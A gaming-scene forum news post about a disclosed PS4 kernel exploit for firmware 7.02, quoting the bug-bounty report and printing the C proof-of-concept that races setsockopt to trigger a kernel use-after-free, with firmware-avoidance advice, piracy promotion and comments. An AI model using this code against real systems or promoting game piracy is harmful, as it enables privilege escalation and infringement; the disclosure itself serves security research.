Category PS4 Jailbreaking       Thread starter PSXHAX       Start date Jul 6, 2020 at 4:49 PM       187,324       438            
As promised last month, PlayStation 4 scene developer theflow0 just dropped the PS4 Kernel Exploit (KEX) for Firmware 7.02 and below which was patched by Sony in 7.50 PS4 OFW (Current OFW is 7.51) and can be chained together with a WebKit exploit like the previously released userland PS4 6.XX WebKit Exploit by Fire30_ that works up to 6.72 PS4 Firmware according to theflow0 with Mira support for 6.72 added as well! 😻
:alert: This means although today's PS4 kernel exploit works up to Firmware 7.02 there is currently only a PS4 userland exploit up to 6.72 publicly available!

Scene Dev @Al Azif suggests on Twitter that nobody should update until the full PS4 jailbreak is released, but for those who can't wait it's advisable NOT to update past 6.72 per @DEFAULTDNB on Twitter until a WebKit exploit supporting 7.02 surfaces!
:alert:

He sends thanks out to diwidog, flat_z, SpecterDev and PlayStation for the collaboration and while not all PlayStation scene developers may be on the same page with how it was handled through Sony's PlayStation Bug Bounty Program, to others it's a win-win as theflow0 received a cash bounty of $10k for his report and the PS4 scene reaped the benefit of having it publicly disclosed today for those who haven't updated to enjoy as a full jailbreak arrives! 💞

Those who'd like to show their appreciation and donate to theflow0 can do so the following ways:
  • via bitcoin 361jRJtjppd2iyaAhBGjf9GUCWnunxtZ49
  • via PayPal
  • via Patreon
To quote from the report via HackerOne.com: Use-After-Free In IPV6_2292PKTOPTIONS leading To Arbitrary Kernel R/W Primitives

Summary


Due to missing locks in option IPV6_2292PKTOPTIONS of setsockopt , it is possible to race and free the struct ip6_pktopts buffer, while it is being handled by ip6_setpktopt. This structure contains pointers (ip6po_pktinfo) that can be hijacked to obtain arbitrary kernel R/W primitives.

As a consequence, it is easy to have kernel code execution. This vulnerability is reachable from WebKit sandbox and is available in the latest FW, that is 7.02.

Attachment

Attached is a Proof-Of-Concept that achieves a Local Privilege Escalation on FreeBSD 9 and FreeBSD 12.
Impact
  • In conjunction with a WebKit exploit, a fully chained remote attack can be achieved.
  • It is possible to steal/manipulate user data.
  • Dump and run backup games.
Code:
/*
* Race condition in ip6_ctloutput where in6p is not locked when calling
* ip6_pcbopts, which allows for a use after free on in6p->in6p_outputopts
*
* Build: gcc -std=c99 -o poc poc.c -lpthread
* Run: ./poc
*
* Discovered by TJ Corley 8/15/2018
*/

#include <netinet/in.h>
#include <pthread.h>
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>

#define IPV6_2292PKTOPTIONS 25

int s;

static void spam_valid() {
    char ctrl[CMSG_SPACE(sizeof(int))];

    struct cmsghdr *cmsg = (struct cmsghdr *)&ctrl;
    cmsg->cmsg_len = CMSG_LEN(4);
    cmsg->cmsg_level = IPPROTO_IPV6;
    cmsg->cmsg_type = IPV6_TCLASS;

    char *data = (char *)CMSG_DATA(cmsg);
    *(int *)data = 0x4;

    printf("spamming valid IPV6_2292PKTOPTIONS\n");
    for (;;) {
        setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, cmsg, CMSG_LEN(4));
    }
}

static void spam_zero_size_mbuf() {
    char *buf[0x4] = {};
    printf("spamming zero size mbuf\n");
    for (;;) {
        setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, buf, 0);
    }
}

int main() {
    pthread_t t;
    s = socket(AF_INET6, SOCK_DGRAM, 0);
    pthread_create(&t, NULL, (void *)spam_valid, NULL);
    spam_zero_size_mbuf();
}
Download: PS4UPDATE.pup (995.5 MB - PS4 6.72 Recovery PUP - MD5: 8140fdd70c1061c379f08566be022ecb) / Mirror / Mirror #2 / Mirror #3 / Mirror #4 via EuropaPeixe
Download: PS4UPDATE.pup (442.4 MB - PS4 6.72 Update PUP - MD5: f3a31f64d894dc06040498cd7383bec2) / Mirror / Mirror #2 / Mirror #3 / Mirror #4 via EuropaPeixe
Cheers to @jwooh for the heads-up on the exploit news, and with Discord help for PSXHAX Member Verifications to access the private area for the latest PS4 PKG games! 🍻
PS4 Kernel Exploit (KEX) for 7.02 Firmware, Wait for Jailbreak Before Updating!.png
 

Comments

vishay

Senior Member
Contributor
Verified
I am also thinking the same thing. Like moddedwarfare said not all devs were happy with the flow. So they will try everything to delay it. Suddenly in such covid crisis specter must go on a vacation, for 2 months lol
 

pop0989

Member
Contributor
Verified
Really excited to be able to update from 5.05 just sad that people weren't patient enough when theFl0w first mentioned that he would release it and harrassed him about it
 

finalman

Senior Member
Contributor
Verified
@pop0989 Back in March 2020 theflow0 said to stay on 6.20 for the exploit. One or two of my PS4s were above that so I updated. Then out of nowhere a few days ago he releases a 7.02 kernel exploit leaks.

Wish he would have gave an update that his exploit was now to include 7.02 guessing it cost others the chance as well.

No big deal though for me cause I've got 3 other already JB Pros.

I also mentioned above about the 7.02 coming out of nowhere, when the flow saying he had a 6.20 exploit months earlier and theflow0 saying he accepted the 10k bounty from Sony.

It turns out this exploit was published to the FreeBSD community two days earlier by someone else then theflow0's quoted Sony handover date.

Makes us wonder if theflow0 saw the exploit published by someone else and went straight to Sony to claim the bounty.
 
Recent Articles
Sony Announces DualShock 4 (DS4) Controller Colors Are Returning
We've seen Translucent Crystal, Midnight Blue & Steel Black, Berry Blue, Sunset Orange, Blue Camo & Copper, Alpine Green and Electric Purple, Red Camouflage, Titanium Blue & Rose Gold DualShock 4...
Ghostwire: Tokyo - Pet the Dog and Deathloop Dev Update PS5 Videos
Sony's latest State of Play August 2020 may be done, but here's a few more PlayStation 5 videos headlining this weekend's PS5 News to enjoy while eagerly awaiting the next-generation console's...
PS4HEN 2.1.3 with 7.51 FW Version Spoof 6.72 Port via Joonie86 / SiSTR0
Following PS4HEN v2.1.3, the PS4HEN v2.1.4 Fork, ESP8266 Xploit Host 2.84g, the PS4 6.72 Jailbreak Exploit Menu v6 updates and PS4 Cheater 1.4.8 with 6.72 support by GiantPluto, today PlayStation...
PS4 PKG Sender v1.03 for PlayStation 4 Package Files by FrostySo
Proceeding the PS4 Package Sender 1.2 Update by @MODDEDWARFARE, this weekend PlayStation 4 developer FrostySo of FrostySo.Github.io shared on Twitter his own PS4 PKG Sender v1.0 followed by v1.01...
Top